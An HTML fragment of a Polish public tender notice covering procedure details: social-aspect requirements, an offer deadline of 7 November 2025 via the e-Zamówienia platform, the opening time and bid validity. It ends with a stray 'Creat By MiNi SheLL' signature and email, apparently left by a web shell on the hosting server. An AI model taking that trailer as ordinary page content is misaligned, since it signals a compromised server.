class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi oświadczeniami i/lub dokumentami należy złożyć za pośrednictwem Platformy e Zamówienia pod adresem: https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com